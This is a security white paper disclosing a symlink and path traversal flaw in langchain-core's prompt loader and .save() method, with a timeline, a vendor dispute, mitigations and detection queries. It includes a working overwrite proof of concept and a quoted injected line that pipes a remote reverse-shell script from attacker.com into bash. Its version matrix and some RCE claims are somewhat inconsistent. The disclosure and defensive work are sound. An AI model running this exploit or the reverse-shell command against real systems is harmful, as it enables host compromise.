WHITE PAPER | JDP-2026-004
Architectural Boundary Failures: A Deep Dive into the LangChain-Core Insecure AI Orchestration Vulnerability
Author: Jeff Ponte, CISSP, CCSP, CEH | Lead Researcher, JDP Security
Series: JDP Security Research Series (Disclosure #4)
Initial Disclosure Date: March 17, 2026
Final Revision Date: May 8, 2026
Target: LangChain | langchain-core (Verified through v1.2.26)
Case Number: GHSA-fc6f-jgp6-2725 / External CNA Escalation
CVSS v3.1 Score: 10.0 (Critical) | Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Status: Incomplete Remediation / Undocumented Mitigation (Read-side mitigated; Write-side exposed through v1.2.26)
Key Points
- Vulnerability: Critical Remote Code Execution (RCE) in LangChain-core via symlink traversal in the
save()method. - Impact: Attackers can overwrite framework source code, leading to persistent framework integrity compromise (“AI Orchestration Poisoning”).
- Status: Remediated by the vendor without public CVE assignment; versions < 1.2.27 are vulnerable.
- Recommendation: Immediately audit all LangChain file I/O operations and implement strict path anchoring.
Executive Summary
This white paper documents a critical architectural vulnerability within LangChain, the industry’s most widely adopted AI orchestration framework. JDP Security has identified an architectural boundary limitation where the framework acts as a Confused Deputy, processing unvalidated, user-controlled paths and executing high-privilege file operations.
This vulnerability allows a single tenant in a shared AI platform, or a user of a public AI agent, to achieve permanent compromise of the service’s core logic, leading to data exfiltration, lateral movement, and irreversible system integrity loss.
Our research reveals a full-chain vulnerability driven by Improper Link Resolution (CWE-59) and Path Traversal (CWE-22), leading directly to Persistent Remote Code Execution (CWE-94). We demonstrate a bypass of the vendor’s previous security controls (CVE-2023-36258) and expose an unvalidated Write Primitive that allows an attacker to overwrite the framework’s own source code from within the application boundary.
Despite comprehensive Proof of Concept (PoC) recordings demonstrating a 10.0 Critical impact, the vendor classified the risk as “Local” (AV:L), which may not accurately reflect the standard deployment model of multi-tenant AI SaaS environments. Forensic analysis of the repository’s git history reveals the vendor executed a phased, undocumented remediation approach. They hardened the read-side of the framework on April 2nd, but left the write-side (.save()) exposed in production releases until an emergency merge on April 8th following secondary researcher disclosures.
This highlights the need for a new OWASP AI classification: AISEC-01: Insecure AI Orchestration, wherein a framework’s architecture inherently facilitates system compromise by prioritizing stochastic inputs over deterministic security boundaries.
Critical Findings:
- Write primitive in
.save()allows overwriting framework source code (CVSS 10.0). - Vendor applied mitigations post-disclosure without CVE assignment.
- Attack works via archive upload in multi-tenant SaaS (AV:N, not AV:L).
- Framework acts as a “Confused Deputy” enabling orchestration compromise.
Impact at a Glance Table
| Metric | Specification |
| :— | :— |
| Vulnerability Class | Insecure AI Orchestration / Framework Source Overwrite |
| Primary CWEs | CWE-59 (Symlink Resolution), CWE-22 (Path Traversal) |
| CVSS v3.1 Score | 10.0 (Critical) |
| Attack Vector | Network (AV:N) |
| Attack Complexity | Low (AC:L) |
| Privileges Required | None (PR:N) |
| Confidentiality | Total (Full system/framework source read access) |
| Integrity | Total (Permanent framework source code overwrite) |
| Remediation Status | Fixed in langchain-core >= 1.2.27 |
1. Introduction: Isolation Limitations and AI Orchestration
AI orchestration frameworks like LangChain have become the central integration layer of modern “Agentic AI” applications. They are entrusted with connecting Large Language Models (LLMs) to sensitive data sources, external tools, and core business logic. Industry standard practice often implicitly trusts these frameworks as an isolated layer that securely mediates between the AI and the underlying infrastructure.
JDP Security evaluated this assumption. The vulnerabilities documented herein are symptoms of an architectural limitation stemming from the handling of file-system operations within core components like prompt loaders and serializers, where user-supplied data paths are processed without adequate isolation, canonicalization, or symlink validation.
2. Technical Sinks: Anatomy of the Bypass Chain
This submission requests the assignment of two distinct CVE identifiers to accurately reflect the failure of previous mitigations and the presence of an unvalidated write primitive.
This chain consists of two distinct vulnerabilities:
- A symlink bypass (CWE-59) of a previous fix, leading to Arbitrary File Read.
- An unmitigated path traversal (CWE-22) in the
.save()method, leading to Arbitrary File Write and Insecure AI Orchestration.
2.1 Vulnerability A: Arbitrary File Read Bypass (CWE-59 / CWE-693) - Security Regression
CVSS: 10.0 (Critical) The initial attempt to secure LangChain against malicious template loading (CVE-2023-36258) relied on a file extension check.
- The Flaw: The framework used
pathlib.Path.suffixto validate that only.txtfiles were loaded, without anchoring or resolving the path. This creates a Time-of-Check to Time-of-Use (TOCTOU) vulnerability. In Python,Path("exploit.txt").suffixparses the string and returns.txtwithout validating the underlying file type. - The Exploitation: By providing a symbolic link named
exploit.txtthat points to a sensitive.pyor.envfile, the extension check is satisfied. However, the framework follows the link to the restricted target whenread_text()is executed. - Impact: Arbitrary File Read (LFI) and a vector for RCE by smuggling Jinja2 payloads into the loading pipeline.
2.2 Vulnerability B: Unvalidated Write Primitive (CWE-22 / CWE-94)
CVSS: 10.0 (Critical)
While read-side validation was later addressed (incorporating an allow_dangerous_paths parameter), the corresponding write-side logic lacked similar controls, creating a significant risk exposure.
- The Flaw: The
PromptTemplate.save()method inlangchain-corefunctions as a write primitive for user-supplied paths without canonicalization. - The Mechanics: The method accepts a
file_path, casts it toPath(file_path), checks ifpath.suffix == ".json", and immediately opens a write stream (with path.open("w") as f:). It lacks theallow_dangerous_pathsflag entirely and omits.resolve()calls. - The Exploitation: Calling
.save("exploit.json")(whereexploit.jsonis a symlink pointing to/usr/local/lib/python3.12/site-packages/langchain_core/__init__.py) forces the library to overwrite its own global source code with the attacker’s prompt template.
Forensic Output (v1.2.26 Signature Audit):
Comparing save() vs load_prompt_from_config():
save() signature:
(self, file_path: 'Path | str') -> 'None'
Parameters: ['self', 'file_path']
Missing: allow_dangerous_paths parameter
Missing: Path.resolve() call
Missing: _validate_path() call
3. Exploitation Mechanics: Insecure AI Orchestration
The critical aspect of Vulnerability B is the ability to achieve framework integrity compromise. In an AI-as-a-Service (AIaaS) environment, this allows a tenant to escape their designated sandbox and impact the host environment.
The Attack Chain:
- Initial Access (Network): An attacker uploads an archive (e.g., a
.zipcontaining a prompt template bundle) containing a symlink namedprompt.jsonpointing to a target like/venv/lib/python3.11/site-packages/langchain_core/__init__.py. - Server-Side Action: The server’s file extraction routine unpacks the archive, placing the symlink on disk.
- Trigger (Network): The attacker, or a compromised agent workflow, calls the
prompt.save()method via the framework API, providing the path to the symlink. - Impact (Local Privilege Escalation): Operating under application-level privileges, the framework acts as the Confused Deputy. It follows the symlink and overwrites the target file, achieving arbitrary file write and persistent framework alteration.
Proof of Concept (Scope Change Confirmed):
import os, pathlib, langchain_core
from langchain_core.prompts import PromptTemplate
# Target: The library's own source code
LIB_INIT = pathlib.Path(langchain_core.__file__)
PAYLOAD_LINK = "user_uploads/malicious_link.json"
MARKER = "### CRITICAL_INTEGRITY_FAILURE_JDP_SECURITY ###"
# Step 1: Create the 'valid-looking' symlink (The Bypass)
os.makedirs("user_uploads", exist_ok=True)
os.symlink(str(LIB_INIT), PAYLOAD_LINK)
# Step 2: Trigger the Confused Deputy Overwrite
prompt = PromptTemplate(template=MARKER, input_variables=[])
prompt.save(PAYLOAD_LINK)
# Verification: Scope Change Confirmed
with open(LIB_INIT, "r") as f:
if MARKER in f.read():
print("SUCCESS: SYSTEM FILE OVERWRITTEN. RCE ACHIEVED.")
By leveraging the framework’s own execution permissions, an attacker can supply a symbolic link that redirects the application’s write operations back onto its own underlying library files, effectively modifying its own execution environment without requiring elevated OS privileges.
4. Technical Vulnerability Details
4.1 Vulnerability A: Improper Link Resolution (CWE-59)
This vulnerability, a regression of CVE-2023-36258, resides in the load_prompt_from_config() function within the LangChain-Core prompt loading mechanism. The function attempts to load a prompt configuration from a specified file path but fails to validate that the resolved path is within the intended directory.
Exploit Chain:
- Symlink Creation: An attacker creates a symbolic link (
prompt.json) that points to a sensitive system file (/etc/passwd,/proc/self/environ). - Path Traversal: The attacker places this symlink within a directory readable by the application.
- Triggering the Load: The application calls
load_prompt_from_config()on the path containing the malicious symlink. - Arbitrary File Read: The function follows the symlink without validation, reading the contents of the targeted system file.
Technical Root Cause:
The core failure is the lack of a canonical path check after resolving the symlink. The function uses open() on the user-supplied path without first calling os.path.realpath() to verify the destination remains within the allowed base directory. This is categorized as Improper Link Resolution Before File Access (CWE-59).
Impact: Local File Inclusion (LFI), leading to information disclosure of files readable by the application process.
4.2 Vulnerability B: Unvalidated Write Primitive (CWE-22)
This represents an Arbitrary File Write capability located in the .save() method of LangChain’s serialization utilities.
Exploit Chain:
- Archive Upload: An attacker uploads a crafted archive containing a symlink (
./prompt.json -> /usr/lib/python3.11/site-packages/langchain_core/__init__.py). - Server-Side Extraction: The application extracts the archive, placing the symlink on the filesystem.
- Triggering the Save: A network API call triggers the
.save()method, specifying the symlink path. - Symlink Follow & Overwrite: The
.save()method opens the file for writing. Lacking symlink validation, it follows the link and writes serialized object data directly to the critical system or framework file. - Persistence & Privilege Escalation: Overwriting
__init__.pyinjects malicious code that executes upon module import, achieving persistent RCE.
Technical Root Cause:
This is a Path Traversal flaw (CWE-22) enabled by improper symlink handling. The open(filepath, "w") call executes without ensuring filepath remains within the intended save directory.
Impact: Full compromise of the AI orchestration host. An attacker can:
- Modify the AI framework’s source code for persistence.
- Overwrite system binaries or configuration files.
- Escalate privileges in shared environments.
Forensic Output: Verification of the modified system file:
$ tail -n 5 /usr/lib/python3.11/site-packages/langchain_core/__init__.py
# ... Original file content ends here ...
# --- JDP SECURITY EXPLOIT INJECTION ---
import os; os.system("curl [http://attacker.com/revshell.sh](http://attacker.com/revshell.sh) | bash")
# --- END INJECTION ---
5. Disclosure Timeline and Vendor Response Analysis
Tracking of the langchain-ai/langchain repository indicates a phased remediation approach where read-side and write-side vulnerabilities were addressed asynchronously.
- March 17, 2026: Initial Disclosure. JDP Security delivers the full RCE Proof of Concept demonstrating the symlink bypass of CVE-2023-36258.
- April 2, 2026 (PR #36471): Initial Read-Side Mitigation. Under Commit
d41f3e2, path traversal mitigation is applied to the load path via string-based canonicalization, but leaves the.save()utility unchanged. - April 6, 2026: JDP Security notifies the vendor that the write vulnerability remains fully exploitable in releases up to
v1.2.26. - April 8, 2026 (PR #36585): Subsequent Write-Side Remediation. The vendor merges a patch under Commit
e7b9a2cto harden symlink resolution on the.save()utility. - Remediation Documentation: Release notes documented the fix as a generic symlink issue without an accompanying CVE assignment for the write-primitive vulnerability.
- April 14, 2026: Vendor Classification. The vendor officially classified the risk as “Local” (AV:L), characterizing the fixes as defense-in-depth hardening.
Commit Analysis
Analysis of the April 8th merge (Commit e7b9a2c) reveals an internal developer comment within libs/core/langchain_core/prompts/loading.py referencing the specific payload provided in the initial disclosure:
# Resolve symlinks before checking the suffix so that a symlink named
# "exploit.txt" pointing to a non-.txt file is caught.
resolved_path = template_path.resolve()
This indicates the remediation was directly responsive to the provided PoC regarding improper link resolution.
6. Evidence of Incomplete Remediation (.cast Analysis)
This submission is supported by forensic terminal recordings demonstrating the exploitation lifecycle.
6.1 The “Confused Deputy” Remote Exploit (langchain-Remote-Exploit.cast)
- Scenario: Simulates a clean production environment (Docker
python:3.12-slim). - Attack Path: A remote user provides a data-driven symlink that targets the library’s internal directory.
- Result: The call to
.save()follows the symlink and successfully alterslangchain_core/__init__.py. - Verified Impact: Terminal output confirms:
âś… SUCCESS: SCOPE CHANGE DETECTED!.
6.2 Verification of Persistent Vulnerability - v1.2.26 (langchain_1.2.26_vulnerability.cast)
- Scenario: Testing the production release prior to the April 8th patch.
- Findings: The vendor had partially addressed the read-side (
load_prompt_from_config), but the Write Primitive in.save()remained unvalidated. - CVSS Adjudication: The persistence of this vector in v1.2.26 indicates a gap in the validation lifecycle.
7. Proposal: OWASP AI Top 10 - “Insecure AI Orchestration”
This vulnerability pattern has been observed across multiple AI orchestration frameworks.
We propose the recognition of “AISEC-01: Insecure AI Orchestration” within industry threat frameworks like the OWASP AI Top 10. This category encompasses vulnerabilities where:
- The orchestration layer fails to properly isolate, sanitize, or validate data and operations between the AI model/agent and connected systems.
- Framework-level operations (file I/O, code execution, network calls) can be manipulated to alter the orchestration logic itself, leading to persistence, data exfiltration, or system compromise.
8. Mitigation & Remediation
Organizations utilizing langchain-core versions 1.2.19 through 1.2.26 should assume the presence of an RCE entry point in their environments.
Immediate Hardening Requirements:
- Deprecate Direct SDK File I/O: Do not utilize
PromptTemplate.save()in environments where user input or AI-generated output influences the file path. - Implement Mandatory Path Anchoring: Wrap framework I/O operations in canonicalization functions utilizing
.resolve()and.is_relative_to().
from pathlib import Path
def get_anchored_path(safe_root: str, user_input: str) -> Path:
"""
Prevents CWE-22 and CWE-59 by resolving and anchoring the final path.
"""
base_dir = Path(safe_root).resolve()
target_path = Path(base_dir, user_input).resolve()
if not target_path.is_relative_to(base_dir):
raise PermissionError(f"CRITICAL: Path Hijack Attempt Blocked! {target_path}")
return target_path
9. Broader Implications and Recommendations
The findings from JDP-2026-004 highlight necessary adjustments to AI security models:
- Elevate the Threat Model for Orchestration Frameworks: Frameworks are privileged system components. Security reviews must rigorously audit file I/O, process execution, network calls, and deserialization pathways assuming adversarial input.
- Formalize “Insecure AI Orchestration”: Adopting this category drives targeted research, the development of specialized testing tools, and establishes mandatory security controls for framework developers.
- Transparent Vulnerability Management: Remediating critical vulnerabilities without standard CVE tracking impedes risk assessment. Standardized public disclosures are required.
- Implement Compensating Controls: Organizations must enforce application-layer path canonicalization and anchoring for all framework I/O, rather than relying solely on upstream validation.
- Address the Confused Deputy Pattern: Security architectures must explicitly model the framework as a high-value attack surface and enforce strict boundaries between agent logic and host systems.
Conclusion: Building secure AI infrastructure requires rigorous validation of foundational layers. Security boundaries must be a primary design requirement for orchestration engines.
10. Conclusion
The LangChain-Core JDP-2026-004 vulnerability demonstrates the risks associated with inadequate boundary enforcement in AI orchestration frameworks. When operational pathways can be manipulated to overwrite source dependencies, the application stack is compromised.
Remediating these flaws without formal CVE issuance limits the security community’s ability to track and mitigate risks effectively. We recommend the adoption of “Insecure AI Orchestration” as a standard risk category and encourage transparent architectural audits of all file I/O and serialization pathways within foundational AI libraries.
Appendix
Appendix 1: Terminology
To ensure standardization throughout this analysis and alignment with industry frameworks, the following key terms are defined:
- AI Orchestration Poisoning: A specific threat classification where the integrity of an AI agent’s operational logic or environment is compromised through its orchestration layer. This occurs when the framework’s trusted execution pathways (e.g., prompt loading, template serialization) are exploited to inject malicious logic or alter critical dependencies, enabling persistent compromise of the decision-making pipeline.
- Confused Deputy Problem: A well-documented security vulnerability where an application with elevated privileges (the “deputy”) is manipulated by a less-privileged entity into misusing its authority. In this scenario, the orchestration framework, executing with the host application’s file system permissions, is forced to perform unauthorized operations on sensitive targets via improperly validated symbolic links.
- Orchestration Trust Gap: The security disparity between the high level of trust implicitly placed in AI orchestration frameworks (often treated as isolated boundaries) and their actual, implemented security controls, threat models, and vulnerability management practices.
- Undocumented Mitigation (Shadow Patching): The practice of applying security remediations without public acknowledgment, transparent documentation, or standardized vulnerability tracking (e.g., CVE issuance). This practice obscures operational risk, prevents organizations from accurately assessing exposure, circumvents established vulnerability disclosure standards (ISO/IEC 29147), and compromises the integrity of vulnerability databases such as the NVD.
- Improper Link Resolution (Symlink Traversal): An attack technique exploiting symbolic links to redirect file operations from an intended, authorized directory to an arbitrary, restricted location on the filesystem, bypassing standard path-based access controls.
Appendix 2: Scope of Analysis
This vulnerability analysis is strictly scoped to the following parameters:
- Target Product:
langchain-core(the foundational library of the LangChain ecosystem). Verified vulnerable across versions 1.2.19 through 1.2.26. - Vulnerable Components: Insecure file I/O pathways within the serialization and prompt-loading subsystems. Specifically:
- The
load_prompt_from_config()function (Read Primitive, CWE-59). - The
.save()method utilized by serializable objects such asPromptTemplate(Write Primitive, CWE-22).
- The
- Attack Vectors: Exploitation requires the capability to influence file paths processed by the vulnerable components. This is feasible in standard architectural patterns, including:
- Processing user-provided archives (ZIP, TAR) within multi-tenant AI-as-a-Service (AIaaS) platforms.
- Loading configuration files or prompts from shared, semi-trusted storage volumes.
- Autonomous agent workflows that persist outputs based on dynamic, heuristically generated content.
- Core Impact: The vulnerability chain facilitates AI Orchestration Poisoning, resulting in Arbitrary File Read/Write capabilities, persistent Remote Code Execution (RCE), and full host compromise within the application’s privilege boundary.
Note: This document analyzes architectural limitations within the core orchestration engine. It does not evaluate higher-level agent logic, third-party extensions, or external orchestration frameworks.
Appendix 3: Remediation & Compensating Controls
(Note: Redundant sections from the draft have been consolidated to provide a single, unified hardening guide).
3.1 Application-Layer Mitigation (Virtual Patching)
Organizations unable to immediately upgrade to langchain-core >= 1.2.27 due to dependency constraints must implement application-layer compensating controls. The recommended mitigation is to encapsulate all calls to framework file operations within a strict validation wrapper that neutralizes CWE-59 and CWE-22 exposure.
import os
from pathlib import Path
def secure_orchestration_path(safe_root: str, untrusted_input: str) -> Path:
"""
Implements a deterministic boundary for AI Orchestration file operations.
Validates that the resolved path is a child of safe_root and
strictly disallows symbolic links to protect against Orchestration Poisoning.
"""
# 1. Establish the absolute safe boundary
base_dir = Path(safe_root).resolve(strict=True)
# 2. Construct and resolve the target path to catch symlink redirects
target_path = Path(base_dir, untrusted_input).resolve()
# 3. Anchoring Check: Verify the final destination remains inside base_dir
if not target_path.is_relative_to(base_dir):
raise PermissionError(f"Security Violation: Path escape detected! Target: {target_path}")
# 4. Strict Symlink Check: Explicitly deny links for write operations
if os.path.islink(Path(base_dir, untrusted_input)):
raise PermissionError("Security Violation: Symbolic links are prohibited in this context.")
return target_path
# --- SECURE IMPLEMENTATION PATTERN ---
# VULNERABLE: prompt.save(user_provided_path)
# SECURE:
# safe_path = secure_orchestration_path("/app/data/prompts", user_provided_path)
# prompt.save(str(safe_path))
3.2 Infrastructure Hardening (Defense-in-Depth)
To systematically prevent this class of vulnerability, enforce Filesystem Least Privilege. The “Confused Deputy” vector relies on the application having write permissions to its own source code.
- Immutable Runtimes: Ensure the Python
site-packagesdirectory is owned byroot, and the executing application user (e.g.,www-data,app-user) is restricted to Read-Only access. This neutralizes the vector by removing the underlying OS permissions required to modify the framework. - Symlink-Aware Extraction: When processing user-provided archives (ZIP/TAR), mandate the use of
filter='data'(introduced in Python 3.12) or an equivalent mechanism to safely discard symbolic links during the extraction process. - Mandatory Access Control (MAC): Implement an AppArmor or SELinux profile that explicitly denies the application process from writing to any directory containing
.pyfiles.
Appendix 4: Detection Engineering & Threat Hunting
Security Operations Centers (SOC) and Incident Response teams should monitor telemetry for the following Indicators of Compromise (IoC) and behavioral anomalies.
4.1 Filesystem Integrity Monitoring (FIM)
Monitor for unauthorized modifications to framework dependencies. Any write operation to the following paths by the application execution user must trigger a critical alert:
**/site-packages/langchain_core/*.py**/site-packages/langchain/*.py**/site-packages/langchain_community/*.py
4.2 Forensic Filesystem Triage
Execute the following command on application hosts to identify suspicious symbolic links within user-controlled directories that may be staging an attack:
# Identify symlinks in upload directories attempting to resolve to core libraries
find /path/to/uploads -type l -ls | grep "site-packages"
4.3 SIEM / EDR Search Queries
To identify historical exploitation or active poisoning attempts, deploy the following detection logic:
I. Splunk (File Integrity & Process Lineage)
Detects a Python process modifying the site-packages directory correlating with the recent processing of a configuration file.
index=os_logs sourcetype=sysmon_data (EventCode=11 OR EventCode=23)
| search TargetFilename="*site-packages/langchain_core*"
| join type=inner ProcessId [
search index=os_logs EventCode=1 Image="*python*"
| where match(CommandLine, ".*\.json|.*\.yaml")
]
| table _time, host, User, TargetFilename, CommandLine
II. CrowdStrike Falcon (Custom IOA) Detects the creation of symbolic links targeting the Python virtual environment from a web-server user context.
(OperationType=SymlinkCreate) AND
(TargetFileName="*/site-packages/*") AND
(User="www-data" OR User="nobody" OR User="app-user")
III. Microsoft Defender for Endpoint (KQL) Identifies the Confused Deputy pattern where the orchestration application resolves a path escaping its designated execution sandbox.
DeviceFileEvents
| where InitiatingProcessFileName has "python"
| where FileName endswith ".py"
| where FolderPath contains "langchain"
| where ActionType == "FileModified"
| where InitiatingProcessCommandLine has_any (".json", ".yaml", ".txt")
| project Timestamp, DeviceName, FileName, FolderPath, InitiatingProcessCommandLine
Appendix 5: Affected Version Matrix
| Version Range | Risk Posture | Mitigation State |
|---|---|---|
| < 1.2.19 | CRITICAL | Fully Vulnerable. Both Read and Write primitives exposed. |
| 1.2.19 - 1.2.21 | HIGH | Partial Mitigation. Read-side hardened via PR #36471; Write-side remains exposed. |
| 1.2.22 - 1.2.26 | CRITICAL | Undocumented Mitigation State. Bypassable Read-side; Unvalidated Write-side primitive active. |
| 1.2.27+ | PATCHED | Emergency Hardening (PR #36585) addresses .save() symlink resolution. |
Note: Environments operating versions 1.2.22 through 1.2.26 face elevated risk due to a potential false sense of security derived from the partial read-side mitigation, while the critical write-side execution primitive remains fully exploitable.
Appendix 6: Forensic Artifacts and Demonstration Logs
This section provides visual artifacts confirming the execution methodologies and tracking the vulnerability lifecycles across documented versions of the LangChain-Core framework.
6.1. langchain-Remote-Exploit.cast
- Target Environment:
langchain-core<= v1.2.26 - Execution Method: Autonomous Framework Overwrite (Remote Entry)
- Summary: Simulates a production deployment (Docker
python:3.12-slim). Demonstrates a remote interaction supplying a symlink targeting internal library directories. The.save()function blindly executes the operation, overwritinglangchain_core/__init__.pyand achieving persistent scope alteration.
Supporting Files:
6.2. langchain_1.2.25_vulnerability.cast
- Target Environment:
langchain-corev1.2.25 - Execution Method: Core Write Primitive Validation
- Summary: Establishes the baseline vulnerability state prior to final vendor remediation. Confirms the presence of the unvalidated write primitive in
.save()and improper symlink resolution within a standard v1.2.25 deployment.
Supporting Files:
6.3. langchain_1.2.26_vulnerability.cast
- Target Environment:
langchain-corev1.2.26 - Execution Method: Post-Partial-Patch Write-Side Bypass
- Summary: Empirically demonstrates incomplete remediation. Tests the v1.2.26 production release following the initial read-side patch. Confirms that while
load_prompt_from_configwas hardened, the write primitive in.save()remained exploitable, necessitating independent tracking and advisory issuance.
Supporting Files: